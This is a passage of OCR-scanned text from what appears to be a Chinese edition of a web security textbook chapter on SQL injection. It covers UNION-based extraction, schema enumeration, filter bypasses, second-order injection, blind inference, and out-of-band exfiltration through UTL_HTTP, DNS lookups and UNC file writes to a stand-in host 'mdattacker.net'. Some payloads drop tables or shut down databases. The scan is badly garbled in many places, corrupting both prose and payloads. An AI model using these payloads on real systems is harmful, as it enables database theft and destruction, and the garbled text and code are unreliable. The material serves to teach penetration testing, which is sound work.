串 值 。 实 际 上 ，NULL 值 可 被 转换 成 任何 数据 类 型 。 因 此 ， 如 果 不 知 道 
某 个 特殊 字段 的 数据 类 型 ， 只 需 在 那个 字段 输入 SELECT NULLE H., 

口 如 果 数 据 库 返回 的 错误 消息 被 应 用 程序 截获 ， 还 是 可 以 轻易 确定 
注入 的 查询 是 否 得 以 执行 。 因 此 ， 如 果 查 询 已 经 执行 ， 那 么 应 用 程序 第 
一 个 查询 返回 的 结果 后 面 会 增加 其 他 结果 。 可 以 据 此 进行 系统 的 推测 ， 
直到 查 明 需 要 注入 的 查询 结构 。 

口 许多 时 候 ， 只 需 在 第 一 个 查询 中 确定 一 个 使 用 字符 串 数据 类 型 的 
字段 就 可 以 达到 自己 的 目的 。 这 足以 允许 注入 任意 返回 字符 串 数 据 的 查 
询 并 获得 其 结果 ， 帮 助 系 统 性 地 从 数据 库 中 提取 任何 想 要 的 数据 。 

















渗透 测试 步 又 


攻击 的 首要 任务 是 查 明 应 用 程序 执行 的 最 初 查询 所 返回 的 列 
数 。 有 两 种 方法 可 以 完成 这 项 任务 。 

(1) 可 以 利用 NULL 被 转换 为 任何 数据 类 型 这 一 事实 ， 系 统 性 
地 注入 包含 不 同 列 数 的 查询 ， 直 到 注入 的 查询 得 到 执行 ， 例 如 ; 

‘UNION SELECT NULL-- 

‘UNION SELECT NULL, NULL-- 

‘UNION SELECT NULL, NULL, NULL-- 

查询 得 到 执行 就 说 明 使 用 了 正确 的 列 数 。 如 果 应 用 程序 不 返回 
数据 库 错 误 消 息 ， 仍 然 可 以 了 解 注 入 的 查询 是 否 成 功 执行 ， 因 为 会 
收 到 另外 一 行 数据 ， 其 中 包含 NULL 或 一 个 空 字 符 串 。 注 意 ， 注 入 
行 可 能 只 包含 空 单 元 格 ， 因 此 不 容易 得 知 何 时 以 HTML 提 交 。 出 于 
这 个 原因 ， 进 行 攻击 的 最 好 是 查看 行 响应 。 

(2) 确定 所 需 的 列 数 后 ， 下 一 项 任务 就 是 找到 一 个 使 用 字符 
串 数据 类 型 的 列 ， 以 便 通 过 它 从 数据 库 中 提取 出 任意 数据 。 和 前 面 
一 样 ， 可 以 通过 注入 一 个 包含 NULL 值 的 查询 ， 并 系统 性 地 用 a 代替 
每 个 NULL， 从 而 完成 这 项 任务 。 例 如 ， 如 果 知 道 查询 必须 返回 3 
列 ， 可 以 注入 以 下 查询 : 

‘UNION SELECT ‘a’, NULL, NULL-- 

‘UNION SELECT NULL, ‘a’, NULL-- 

‘UNION SELECT NULL, NULL, ‘a’-- 

如 果 注 入 的 查询 得 到 执行 ， 将 看 到 另 一 行 包含 a 值 的 数据 ， 然 
后 就 可 以 使 用 相关 列 从 数据 库 中 提取 数据 。 
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注解 ”在 Oracle 数 据 库 中 ， 每 个 SELECT 语句 必须 包含 一 个 
FROM 属性 ， 因 此 ， 无 论 列 数 是 否 正 确 ， 注 入 UNION SELECT 
NULL 将 产生 一 个 错误 。 可 以 选择 使 用 全 局 可 访问 表 (globally 
accessible table) DUAL 来 满足 这 一 要 求 。 例 如 : 

‘UNION SELECT NULL FROM DUAL-- 


如 果 已 经 确定 注入 的 查询 所 需 的 列 数 ， 并 且 已 经 找到 一 个 使 用 字符 
串 数据 类 型 的 列 ， 就 能 够 提取 出 任意 数据 。 一 个 简单 的 概念 验证 测试 是 
提取 数据 库 的 版 本 字符 串 ， 可 以 对 任何 数据 库 管理 系统 (DBMS) 进行 
测试 。 例 如 ， 如 果 碍 询 一 共有 3 列 ， 第 一 列 可 以 提取 字符 串 数 据 ， 可 以 
在 MS-SQL 和 MySQL 中 注入 以 下 查询 提取 数据 库 版 本 : 


' UNION SELECT @@version, NULL, NULL-- 
对 Oracle 注 入 以 下 查询 将 得 到 相同 的 结果 : 


' UNION SELECT banner,NULL,NULL FROM v$version-- 


在 前 面 介绍 的 易 受 攻击 的 图 书 搜索 应 用 程序 中 ， 可 以 使 用 这 个 字符 
串 作 为 搜索 项 来 获得 Oracle 数据 库 的 版 本 : 





书 出 版 年 
作 者 名 me 


CORE 9.2.0.1.0 Production 

NLSRTL Version 9.2.0.1.0 - Production 
Oracle9i Enterprise Edition Release 9.2.0.1.0 - 
Production 

PL/SQL Release 9.2.0.1.0 - Production 

TNS for 32-bit Windows: Version 9.2.0.1.0 - 
Production 


SR, ABE EMRE FIT PERINNE JH A BTR RPK 
软件 中 的 漏洞 ， 但 是 ， 在 多 数 情 况 下 ， 我 们 仍然 对 从 数据 库 中 提取 数据 
更 感 兴 趣 。 要 做 到 这 一 点 ， 渗 透 测 试 员 需 要 解除 前 面 描述 的 第 二 个 限 
ea es a Pere eee 
Ko 


9.2.6 ”提取 有 用 的 数据 
为 了 从 数据 库 中 提取 有 用 的 数据 ， 通 常 需要 了 解 表 以 及 包含 预 访问 


的 数据 所 属 列 的 名 称 。 大 型 企业 DBMS 中 包含 大 量 数据 库 元 数据 ， 可 以 
查询 这 些 数据 碍 明 数 据 库 中 每 一 个 表 和 列 的 名 称 。 在 各 种 情况 下 ， 提 取 














有 用 数据 所 使 用 的 方法 完全 相同 ; 但 是 ， 在 不 同 数据 库 平 台 上 的 应 用 细 
节 各 不 相同 。 


9.2.7 UNION# FL 


下 面 我 们 将 分 析 一 个 攻击 ， 虽 然 该 攻击 针对 的 是 MS-SQL 数 据 库 ， 
但 它 采 用 的 攻击 方法 适用 于 所 有 数据 库 技术 。 以 用 户 维护 联系 人 列表 及 
查询 和 更 新 联系 人 信息 的 通讯 录 应 用 程序 为 例 。 如 果 用 户 在 通讯 录 中 搜 
索 名 为 Matthew 的 联系 人 ， 浏 览 器 将 提交 以 下 参数 : 


Name=Matthew 
应 用 程序 将 返回 以 下 结 





人 名 电子 邮件 地 址 
Matthew Adamson handytrick@gmail.com 


尝试 访问 
http://mdsec.net/addressbook/32/ 
首先 ， 我 们 需要 确定 请 求 的 列 数 。 对 单一 列 进行 测试 导致 了 以 下 错 


TRIBE: 


Name=Matthew' $20unicn$20select$20naull-- 


All queries combined using a UNION, INTERSECT or EXCEPT operator must 


have an equal number of expressions in their target lists. 


我 们 添加 另 一 个 NULL， 并 得 到 同样 的 错误 。 于 是 我 们 继续 添加 
NULL， 直 到 碍 询 被 执行 ， 并 在 结果 表 中 生成 另 一 个 数据 项 ， 如 下 所 
ZN: 


Name=Matthew'%20union%20select%20null, null, null, null, null 


人 名 电子 邮件 地 址 
Matthew Adamson handytrick@gmail.com 


[E] [z] 


MERTE AWK — 9 ze aA TIT E A: 


Name=Matthew'%20union%20select%20'a',null,null,null,null 


人 名 电子 邮件 地 址 


Matthew Adamson handytrick@gmail.com 
[a] 





接 下 来 ， 需 要 查 明 可 能 包含 有 用 信息 的 数据 库 表 和 列 的 名 称 。 为 
此 ， 我 们 需要 查询 元 数据 表 information_schema.columns， 其 中 包含 数据 





库 中 的 所 有 表 和 列 名 称 的 详细 资料 。 使 用 以 下 请 求 可 以 检索 上 述 信息 


Name=Matthew'$20unions20select*20table name, column_name,null,null, 


nulls20froms20information_schema.columns 


人 名 电子 邮件 地 址 
Matthew Adamson handytrick@gmail.com 
shop_items Price 
shop_items Prodid 
shop_items Prodname 
addr_book Contactemail 
addr_book Contactname 
Users Username 
Users Password 


从 以 上 结果 可 以 确定 ， 很 明显 ， 我 们 可 以 从 用 户 表 开始 提取 数据 。 
eee 


ame=Matthew' $20UNIONG20select%20username, password, null,null,null$20 
人 名 电子 邮件 地 址 
Matthew Adamson handytrick@gmail.com 
administrator fme69 
dev uber 
marcus 8pinto 
smith twosixty 
jlo 6kdown 


V 提示 MS-SQL、MySQL 和 许多 其 他 数据 库 (包括 SQLite 


和 Postgresql〉 均 支持 information_schema。 它 主要 用 于 保存 数据 库 
元 数据 ， 这 也 使 它 成 为 探查 数据 库 的 攻击 者 的 主要 目标 。 需 要 注意 
的 是 ，Oracle 并 不 支持 该 方案 。 对 Oracle 数 据 库 实 施 攻击 时 ， 攻 击 
方法 在 其 他 各 方面 可 能 完全 相同 。 但 是 ， 需 要 使 用 查询 
SELECTtable_name,column_name FROM all_tab_columns 来 检索 有 关 
数据 库 表 和 列 的 信息 。 使 用 user_tab_columns 表 以 仅 针 对 当前 数 
据 库 。) 通常 ， 在 分 析 大 型 数据 库 以 探查 攻击 目标 时 ， 最 好 是 查找 
有 用 的 列 名 称 ， 而 不 是 表 。 例 如 : 


i i is, Lill L P| N 











Yo tem 如 果 目 标 表 返 回 了 多 个 列 ， 则 可 以 将 这 些 列 串 连 到 
单独 一 个 列 中 ， 这 样 检索 起 来 会 更 加 方便 ， 因 为 这 时 只 需要 在 原始 
查询 中 确定 一 个 varchar 字 段 : 
口 Oracle: SELECT table_namel|’:’||column_name FROM 
all_tab_columns 
OY MS-SQL: SELECT table_name+’:’+column_name from 
information_schema.columns 
O MySQL: SELECT CONCAT(table_name,’:’,column_name) 
from information_schema.columns 
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止 攻击 者 无 限制 地 利用 其 中 存在 的 缺陷 。 例 如 ， 应 用 程序 可 能 会 删除 或 
净化 某 些 字符 ， 或 阻止 常用 的 SQL 关键 字 。 这 种 过 滤 通 常 非常 容易 避 
开 ， 这 时 可 答 试 使 用 各 种 技巧 。 
1. 避免 使 用 被 阻止 的 字符 

如 果 应 用 程序 删除 或 编码 某 些 在 SQL 注入 攻击 中 经 常用 到 的 字符 ， 
不 使 用 这 些 字 符 仍 然 能 够 实施 攻击 。 

口 如 果 要 注入 数字 数据 字段 或 列 名 称 ， 不 一 定 必须 使 用 单 引 号 。 要 
在 攻击 有 效 载 倍 中 插入 字符 串 ， 不 使 用 引号 仍 可 以 做 到 这 一 点 。 这 时 ， 





可 以 通过 各 种 字符 串 函 数 ， 使 用 每 个 字符 的 ASCII 代 码 动 态 构 建 一 个 字 
符 串 。 例 如 ， 下 面 两 个 查询 分 别 用 于 Oracle 和 MS-SQL， 它 们 等 同 于 


select ename,sal from emp where ename=‘marcus’ : 





SELECT ename, sal FROM emp where ename=CHR (109) | |CHR(97) | | 


CHR (114) | |CHR(99) | |CHR(117) | |CHR(115) 


SELECT ename, sal FROM emp WHERE ename=CHAR(109})+4+CHAR (97) 
+CHAR (114) +CHAR (99) +CHAR(117)+CHAR(115) 


口 如 条 注释 符号 被 阻止 ， 通 常 可 以 设计 注入 的 数据 ， 使 其 不 会 破坏 
周围 查询 的 语法 。 例 如 ， 不 用 注入 


t or L=1L<—= 
可 以 注入 


! or a? = “et 
口 在 MS-SQL 数 据 库 中 注入 批量 查询 时 ， 不 必 使 用 分 号 分 隅 符 。 只 
要 纠正 所 有 批量 碍 询 的 语法 ， 无 论 你 是 否 使 用 分 号 ， 碍 询 解 林峰 都 会 正 
确 解释 它们 。 





Al, yD `A D 

笑 试 访问 
http://mdsec.net/addressbook/71/ 
http://mdsec.net/addressbook/76/ 


2. 避免 使 用 简单 确认 
一 些 输 入 确认 机 制 使 用 一 个 简单 的 黑 名 单 ， 阻 止 或 删除 任何 出 现在 

这 个 名 单 中 的 数据 。 在 这 种 情况 下 ， 应 该 尝试 使 用 标准 的 攻击 方法 ， 寻 
找 确 认 和 规范 化 机 制 中 的 常见 缺陷 《如 第 2 章 所 述 ) 。 例 如 ， 如 果 
SELECT 关 键 字 被 阻止 或 删除 ， 可 以 尝试 使 用 以 下 输入 : 

SeLeCt 

S00SELECT 

SELSELECTECT 

$53%45%40%45%43%54 


$2553%2545%2540%92545%2543%92554 


Al, yn vw) 

笑 试 访问 
http://mdsec.net/addressbook/58/ 
http://mdsec.net/addressbook/62/ 


3. 使 用 SQL 注释 

与 C++ 一 样 ， 我 们 也 可 以 在 SQL 语句 中 插入 行内 注释 ， 注 释 内 容 包 
舍 在 /#* 与 #/ 符 号 之 间 。 如 果 应 用 程序 阻止 或 删除 输入 中 的 空格 ， 可 以 使 
用 注释 “冒充 ?注入 数据 中 的 空白 符 。 例 如 : 


SELECT/ * foo*/username, password/* foo* /FROM/*foo*/users 


在 MySQL 中 ， 注 释 甚 至 可 以 插入 关键 字 中 ， 这 种 方法 可 避 开 某 些 
输入 确认 过 滤 ， 同 时 保留 查询 中 的 语法 。 例 如 : 


SEL/*foo*/ECT username,password FR/*foo*/OM users 


4. AHARI 

输入 确认 机 制 通常 包含 逻辑 缺陷 ， 可 对 这 些 缺 陷 加 以 利用 ， 使 被 阻 
止 的 输入 避 开 过 滤 。 多 数 情 况 下 ， 这 类 攻击 会 利用 应 用 程序 在 对 多 个 确 
认 步 又 进行 排序 ， 或 未 能 以 递归 方式 应 用 净化 逻辑 方面 的 缺陷 。 我 们 将 
在 第 11 章 介绍 这 类 攻击 。 








尝试 访问 


http://mdsec.net/addressbook/67/ 


9.2.9 二 阶 SQL 注 入 


一 种 特别 有 益 的 避 开 过 滤 的 方法 与 二 阶 SQL 注 入 (second-order 
SQL injection) 有 关 。 当 数据 首次 插入 数据 库 中 时 ， 许 多 应 用 程序 能 够 
安全 处 理 这 些 数据 。 但 是 ， 一 旦 数据 存储 在 数据 库 中 ， 随 后 应 用 程序 本 
吴 或 其 他 后 端 进程 可 能 会 以 危险 的 方式 处 理 这 些 数据 。 许 多 这 类 应 用 程 
I 

IRF o 

在 一 些 应 用 程序 中 ， 用 户 输入 在 到 达 时 通过 转 义 单 引 号 来 进行 确 
认 。 在 前 面 搜索 书籍 的 示例 中 ， 这 种 方法 明显 有 效 。 当 用 户 输入 搜索 项 
O'Reilly 时 ， 应 用 程序 执行 以 下 但 询 : 














SELECT author,title,year FROM books WHERE publisher = 'O''Rei 


在 这 个 查询 中 ， 用 户 提 交 的 单 引 号 被 转换 为 两 个 单 引 号 ， 因 而 传送 
给 数据 库 的 搜索 项 与 用 户 最 初 输入 的 表达 式 具 有 相同 的 字符 含义 。 

与 单 引号 配对 方法 有 关 的 问题 出 现在 更 复杂 的 情形 中 ， 此 时 同一 个 
数据 项 被 提交 给 几 个 SQL 查 询 ， 然 后 写 入 数据 库 被 几 次 读 取 。 这 是 证 明 
简单 输入 确认 相对 于 边界 确认 存在 不 足 的 一 个 示例 ， 如 第 2 章 所 述 。 

回 到 前 面 那个 允许 用 户 自 我 注册 并 且 在 一 个 INSERT 语 句 中 存在 
SQL 注入 漏洞 的 应 用 程序 。 假 设 开 发 者 将 修复 出 现在 用 户 数据 中 的 所 有 
单 引 号 配对 导致 的 漏洞 。 注 册 用 户 名 foo' 来 建立 如 下 查询 ， 它 不 会 在 数 
据 库 中 造成 问题 : 




















INSERT INTO users (username, password, ID, privs) VALUES ({'foo'' 
"secret’, 2248, 1) 
目前 为 止 一 切 正常 。 然 而 ， 假 设 应 用 程序 还 执行 密码 修改 功能 ， 那 


么 只 有 通过 验证 的 用 户 才 能 够 访问 这 项 功能 ， 而 且 为 了 加 强 保护 ， 应 用 
程序 要 求 用 户 提 交 原 始 密 码 。 然 后 应 用 程序 从 数据 库 中 提取 用 户 的 当前 
密码 ， 并 对 两 个 字符 串 进 行 比较 ， 核 对 用 户 提供 的 密码 是 否 正确 。 要 完 


成 核对 任务 ， 它 首先 要 从 数据 库 提 取 用 户 的 用 户 名 ， 然 后 建立 如 下 得 


询 : 
LECT password FROM users WHERE username = ‘'foo'' 


因为 保存 在 数据 库 中 的 用 户 名 是 字面 量 字符 吊 foo， 当 应 用 程序 提 
出 访问 要 求 时 ， 数 据 库 即 返回 这 个 值 ， 只 有 在 字符 串 被 传送 给 数据 库 时 
才 使 用 配对 的 转 义 序列 。 因 此 ， 当 应 用 程序 重复 使 用 这 个 字符 串 并 将 它 
供 入 到 另 一 个 查询 中 时 ， 就 会 造成 一 个 SQL 注入 漏洞 ， 用 户 最初 的 恶意 
输入 就 被 谨 入 到 查询 中 。 当 用 户 尝试 修改 密码 时 ， 应 用 程序 返回 以 下 消 
E, ie S ERIBA: 


Unclosed quotation mark before the character string 'foo 
要 利用 这 种 漏洞 ， 攻 击 者 只 需 注 册 一 个 包含 专门 设计 的 输入 用 户 
名 ， isi 2 Ap Be A A 
Or in (select passwo from users where username='admin')-- 


注册 步 又 pe 如 果 攻击 者 尝试 修改 密码 他 注入 
WN cee aah AE Ly 流露 管理 员 的 密码 : 

















Microsoft OLE DB Provider for ODBC Drivers error '80040e07' 
[Mic oft] [co SQL Server Driver][SQL Server]Syntax error converting 
the varchar value 'fme69' to a column of data type int. 


攻击 者 已 经 成 功 避 开 旨 在 阻止 SQL 注入 攻击 的 输入 确认 ， 现 在 他 能 
够 在 数据 库 中 执行 任意 查询 并 获得 查询 结果 。 











尝试 访问 : 


http://mdsec.net/addressbook/107/ 





到 现在 为 止 ， 我 们 描述 的 所 有 攻击 中 ， 有 一 些 现成 的 方法 可 帮助 从 
数据 库 中 提取 有 用 的 数据 ， 例 如 ， 通 过 执行 UNION 攻 击 或 在 错误 消 奶 
中 返回 数据 。 随 者 人 们 防御 SQL 注入 威胁 意识 的 增强 ， 这 种 情形 已 经 逐 
渐 消 失 。 如 今 ， 即 使 遇 到 SQL 注入 漏洞 ， 攻 击 者 仍然 无 法 直接 获取 注入 
的 碍 询 的 结果 ， 这 种 情况 日 瘟 增 多 。 我 们 将 讨论 几 种 出 现 这 种 问题 的 情 
况 ， 以 及 如 何 处 理 这 些 情况 。 
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的 输入 ， 攻 击 者 就 能 够 使 用 关闭 命令 (shutdown〉 关闭 一 个 MS- 
SQL 数据 库 。 





shutdown-- 
~ 还 可 以 注入 恶意 命令 ， 如 下 面 这 些 命令 可 删除 一 些 数据 库 


' drop table users-- 
' drop table accounts-- 
' drop table customers-- 


1. 获取 数字 数据 





如 果 包 含 单 引号 的 输入 得 到 正确 处 理 ， 那 么 应 用 程序 中 的 字符 串 字 
段 就 不 易 受 SQL 注 入 攻击 。 但 是 ， 数 字数 据 字 上 段 可 能 仍然 存在 漏洞。 在 
这 种 字段 中 ， 用 户 输入 并 不 包含 在 单 引 号 中 。 这 时 攻击 者 只 有 通过 应 用 
程序 的 数值 啊 应 Cnumeric response) ， 才 能 获得 注入 查询 的 结果 。 

在 这 种 情况 下 ， 攻 击 者 需要 做 的 是 获取 数字 形式 的 有 用 数据 ， 对 注 
入 查询 的 结果 进行 处 理 。 他 们 可 以 使 用 以 下 两 个 关键 函数 : 

口 ASCII， 它 返回 输入 字符 的 ASCII 代 码 ，; 

口 SUBSTRING (或 Oracle 中 的 SUBSTR) ， 它 返回 输入 的 子 字符 


”这 些 函 数 可 结合 在 一 起 使 用 ， 以 数字 形式 从 一 个 字符 囊 中 提取 单独 
FFE 9 Bil OM: 





SUBSTRING(‘Admin’,1,1)i& [HIJA 
ASCII(‘A’)i& [F165 


因此 


ASCII(SUBSTR(‘Admin’,1,1)) 返 回 65 

使 用 这 两 个 函数 ， 可 以 系统 地 将 一 个 有 用 数据 的 字符 串 分 割 成 单个 
的 字符 ， 并 以 数字 形式 分 别 返 回 每 一 个 字符 。 在 自 定义 攻击 中 ， 可 以 利 
Pa VA UR 7S FS EE, MERE EEK EET FITE 








Vo 提示 在 处 理 字 符 串 操作 和 数字 计算 方面 ， 不 同 数 据 库 平 
台 之 间 存 在 大 量 细 微 的 区 别 ， 当 实施 这 种 高 级 攻击 时 ， 攻 击 者 需要 
意识 到 这 类 区 别 。 通 过 以 下 地 址 可 以 找到 说 明 不 同 数 据 库 之 间 这 些 
区 别 的 详细 指南 : http://sqlzoo.net/howto/source/z.dir/i08fun.xml。 


我 们 曾经 过 到 上 述 问题 的 男 一 种 表现 形式 ， 即 应 用 程序 返回 的 并 不 
古 真正 的 数字 ， 而 是 一 些 以 该 数字 为 标识 符 的 资源 。 应 用 程序 根据 用 户 
的 输入 执行 一 个 SQL 得 询 ， 获 得 一 个 文档 的 数字 标识 符 ， 然 后 将 文档 的 
内 容 返 回 给 用 户 。 在 这 种 情况 下 ， 攻 击 者 可 以 先 获得 标识 符 在 相关 数字 
范围 内 的 每 一 份 文档 的 备份 ， 然 后 在 文档 内 容 与 标识 符 之 间 建 立 映 射 。 
接 下 来 ， 当 实施 前 面 描述 的 攻击 时 ， 攻 击 者 就 可 以 参考 这 个 映射 确定 应 
用 程序 返回 的 每 个 文档 的 标识 符 ， 因 而 得 到 他 们 成 功 提 取 的 字符 的 

















ASCII 值 。 
2. 使 用 带 外 通道 

在 许多 SQL 注入 攻击 中 ， 应 用 程序 并 不 在 用 户 的 浏览 器 中 显示 注入 
查询 的 结果 ， 也 不 返回 数据 库 生 成 的 任何 错误 消息 。 很 明显 ， 在 这 种 情 
况 下 ， 即 使 一 个 SQL 注入 漏洞 确实 存在 ， 攻 击 者 也 无 法 对 其 加 以 利用 ， 
提取 任意 数据 或 执行 任何 其 他 操作 。 但 是 ， 这 种 想法 是 错误 的 ， 即 使 出 
e a een yee 
得 成 了 

许多 时 候 ， 可 以 注入 任意 一 个 查询 ， 但 却 无 法 获得 查询 结果 。 回 到 
它 的 用 户 名 和 密 "3 


cy IM users WHER sername = ‘marc ' and passworG ‘secret’ 


A T West NH LATER. 还 可 以 注入 一 个 完 spate tt 
di 
PUN: 




















foo' | SELECT 1 FROM dual WHERE (SELECT username FROM all_users WHERE 


username = 'DBSNMP') = 'DBSNMP')-- 


应 用 程序 将 执行 TUA FAW: 


SELECT * FROM ugers WHERE username = 'Eoo' | (SELECT 1 FROM dual WHERE 
{SELECT username FROM all users WHERE username = 'DBSNMPF' = "DBSNMP') 


数据 库 将 执行 注入 的 任何 子 查询 ， 并 将 它 的 结果 附加 在 foo 之 后 ， 
然后 查找 所 生成 用 户 名 的 资料 。 当 然 ， 这 种 登录 不 会 成 功 ， 但 会 执行 注 
入 的 查询 。 在 应 用 程序 啊 应 中 收 到 的 只 是 标准 的 登录 失败 消息 。 现 在 需 
要 想 办 法 获得 注入 查询 的 结果 。 

如 果 能 对 MS-SQL 数 据 库 使 用 批量 查询 (batch query) ， 这 时 就 会 
出 现 男 一 种 情形 。 批 量 查 询 特别 有 用 ， 因 为 它们 允许 执行 一 个 完全 独立 
的 语句 ， 在 这 个 过 程 中 ， 渗 透 测 试 员 拥有 全 部 的 控制 权 ， 可 以 使 用 另外 
的 SQL 语句 并 针对 不 同 的 表 进 行 查询 。 但 是 ， 因 为 批量 得 询 执行 查询 的 

方式 比较 特殊 ， 我 们 无 法 直接 获得 注入 查询 的 执行 结果 ， 同 样 需要 想 办 
法 获得 注入 查询 的 结果 。 

在 这 种 情况 下 ， 一 种 获取 数据 的 有 效 方法 是 使 用 带 外 通道 。 能 够 在 
数据 库 中 执行 任意 SQL 语 句 后 ， 渗 透 测试 员 4 往往 可 以 利用 数据 库 的 一 Lb 
内 置 功能 在 数据 库 与 自己 的 计算 机 之 间 建 并 网络 连接 ， 通 过 它 传送 从 数 
据 库 中 收集 到 的 任何 数据 。 

建立 适当 网 络 连 接 的 方法 依 不 同 的 数据 库 而 定 ， 而 且 取 决 于 应 用 程 
序 访问 数据 库 所 使 用 的 用 户 权 限 。 下 面 将 描述 一 些 使 用 每 种 数据 库 时 最 
和 常用、 最 有 效 的 技巧 。 




















@ MS-SQL 

一 些 老式 数据 库 ， 如 MS-SQL2000 以 及 更 早 的 版 本 ， 可 使 用 
OpenRowSet 命 令 与 外 部 数据 库 建立 连接 并 在 其 中 插入 任何 数据 。 例 
如 ， 下 面 的 查询 可 使 目标 数据 库 与 攻击 者 的 数据 库 建立 连接 ， 并 将 目标 
数据 库 的 版 本 字符 串 插入 表 foo 中 : 


'DRIVER={SỌL Server}; SERVER=mGattacker.net, 80;UID=sa; PWD=letmein', 





注意 ， 可 以 指定 端口 80， 或 者 任何 其 他 可 能 的 值 ， 以 提高 罕 透 防火 
普 建 并 外 部 连接 的 可 能 性 。 


rom £00') alues {@@version) 





@ Oracle 
Oracle 中 包含 大 量 低 权限 用 户 可 访问 的 默认 功能 ， 可 以 使 用 它们 建 
ALi SEF 


UTL_HTTP 包 可 用 于 同 其 他 主机 提出 任意 HTTP 请 求 。UTL_HTTP 
包含 丰富 的 功能 ， 并 支持 代理 服务 器 、cookie、 重 定向 和 验证 。 这 意味 
着 ， 如 果 攻 击 者 已 经 攻破 一 个 受到 强大 保护 的 企业 内 部 网 络 中 的 数据 
库 ， 他 就 能 够 利用 企业 代理 服务 器 与 因特网 建立 外 部 连接 。 

要 的 示例 中 ，UTL_HTTP 用 于 加 攻击 者 控制 的 服务 器 传送 注入 
Et VA) BY ZA AR o 


/employees.asp? &mpNo=7521' | |UTL_HTTP . request ('mdattacker.net:30/'|| 


(SELECT$20username$2 0FROM$20al1]1 userst2 0WHERES2Z0ROWNUMS3d1) }-- 





这 个 URL 促 使 UTL_HTTP 提 出 一 个 GET 请 求 ， 要 求 访 问 包含 
all_users 表 中 第 一 个 用 户 名 的 URL。 攻 击 者 只 需 在 mdattacker.net 安 装 一 
个 netcat 监 听 器 就 可 以 收 到 结果 。 

C:\>ne -nLp 80 

GET /SYS HTTP/1.1 
Host: mdattacker.net 
Connection: close 


UTL_INADDR 包 则 在 将 主机 名 解析 为 IP 地 址 。 它 可 用 于 在 攻击 者 
控制 的 服务 器 中 生成 任意 DNS 查 询 。 许 多 时 候 ， 相 比 于 UTL_HTTP 攻 
击 ， 这 类 攻击 更 可 能 取得 成 功 ， 因 为 即使 HTTP 流 量 被 阻止 ， 通常 DNS 
流量 仍然 能 够 穿 透 企业 防火 墙 。 攻 击 者 能 够 利用 这 个 包 查 找 选择 的 主机 





A wo eaae eee 以 此 迅速 获得 任意 数 
E, PE: 


ssf Se gd Arik ER 
20FR ODBA_USERS WHERE 2 0NAME= ') | | '.mdattacker.net') 


at oe Ja 的 密码 es [á mitt hash) 的 mdattacker.net 名 
称 服 务 器 发 出 下 面 这 个 DNS 碍 询 : 


DCB748A5BC5390F2 .mdattacker.net 


UTL_SMTP 包 可 用 于 发 送 电子 邮件 。 在 出 站 电子 邮件 中 发 送 这 个 
包 ， 即 可 获得 大 量 从 数据 库 中 截取 的 数据 。 
UTL_TCP 包 可 用 于 打开 任意 TCP 套 接 字 ， 以 发 送 和 接收 网 络 数 据 。 





= 
7 
; 注解 ”在 Oracle 11g 中 ，ACL 为 上 述 许多 资源 提供 保护 ， 以 
防止 任意 数据 库 用 户 执 行 恶 意 操作 。 只 需 研 究 一 下 Oracle 11g 中 所 
供 的 新 功能 ， 束 可 以 轻松 避 开 该 ACL， 使 用 以 下 代码 即 可 实现 : 
SYS.DBMS_LDAP.INIT((SELECT PASSWORD FROM 
SYS.USER$ WHERE NAME=‘SYS7’)||‘.mdsec.net’,80) 








@ MySQL 
SELECT...INTO OUTFILE 命 令 可 将 任意 一 个 查询 的 输出 指 同 一 个 


文件 。 指 定 的 文件 名 可 包含 UNC 路 径 ， 人 允许 将 输出 指向 自 己 计 算 机 上 的 
一 个 文件 。 


select outfile '\\\\mdattacker.net\\share\\o ut. txt’ 








要 想 接收 到 文件 ， a 多 许 匿名 写 入 访 
问 。 可 以 在 基于 Windows 和 UNIX 的 平台 上 配置 共享 ， 以 实现 匿名 写 
入 。 如 果 无 法 接收 到 输出 的 文件 ， 可 能 是 因为 SMB 服 务 器 的 配置 有 问 
题 。 可 以 使 用 一 个 咒 探 器 确定 目标 服务 嚣 是否 与 指定 计算 机 建立 了 入 站 
连接 (inbound connection) ， 如 果 连 接 已 经 建立 ， 参 考 服务 器 文档 资料 
确保 它 得 到 正确 配置 。 

9 利用 操作 系统 

通常 可 以 在 数据 库 服务 器 的 操作 系统 上 执行 任意 命令 ， 以 此 实施 权 
限 提升 攻击 。 这 时 ， 芭 击 阁 可 以 采用 证 多 手段 获得 数据 ， 如 使 用 tftp、 
mail 和 telnet 等 内 置 命令 ， 或 者 将 数据 复制 到 Web 根 目录 使 用 浏览 器 获 











取 。 请 参阅 9.2.11 节 了 解 提升 数据 库 权 限 的 各 种 技巧 。 
3. 使 用 推论 : 条 件 式 响应 

造成 带 外 通道 不 可 用 的 原因 有 许多 。 大 多 数 情况 下 ， 是 因为 数据 库 
处 在 一 个 受 保护 的 网 络 中 ， 它 的 边界 防火 墙 禁 止 任何 与 因特网 或 其 他 网 
络 的 帝 外 连接 。 这 时 ， 只 能 通过 Web 应 用 程序 注入 点 (injection point) 
访问 数据 库 。 

在 这 种 情况 下 ， 攻 击 或 多 或 少 带 有 盲目 性 质 ， 但 攻击 者 仍然 可 以 使 
用 各 种 技巧 从 数据 库 中 获得 任意 数据 。 这 些 技巧 全 都 基于 如 下 概念 : 使 
用 一 个 注入 查询 有 条 件 地 在 数据 库 中 触发 某 种 可 以 探测 的 行为 ， 然 后 根 
据 这 种 行为 是 否 发 生 推 新 出 所 需 信息 。 

回 到 那个 可 注入 用 户 名 和 和 密码 字段 以 执行 任意 查询 的 登录 功能 : 


SELECT * FROM users WHERE username = ‘marcus' and password = 'secret' 


(BORA TR ERE A AW HI RK Il ae ITI, (ARAN 
经 知道 如 何 使 用 SQL 注入 改变 应 用 程序 的 行为 。 例 如 ， 提 交 下 面 两 个 输 
入 将 得 到 截然 不 同 的 结果 : 


admin' AND 1=1-- 
admin' AND 1=2-- 


在 第 一 种 情况 中 ， 应 用 程序 将 允许 攻击 者 以 管理 员 的 身份 登录 。 在 
第 二 种 情况 中 ， 登 录 尝 试 将 会 失败 ， 因 为 1=2 这 个 条 件 总 为 假 。 可 以 利 
用 这 种 应 用 程序 行为 控制 推断 数据 库 中 任意 条 件 的 真 假 。 例 如 ,使 用 前 
面 描述 的 ASCIT 和 SUBSTRING 函 数 ， 攻 击 者 可 以 测试 截获 字符 串 中 的 一 
个 字符 是 否 为 特定 的 值 。 例 如 ， 提 交 下 面 这 段 输入 将 允许 攻击 者 以 管理 
员 身 份 登录 ， 因 为 经 测试 条 件 为 真 : 


admin' AND ASCII(SUBSTRING('Admin',1,1)) = 65-- 


但 是 ， 提 交 下 面 的 输入 ， 登 录 不 会 取得 成 功 ， 因 为 经 测试 条 件 为 
假 : 


























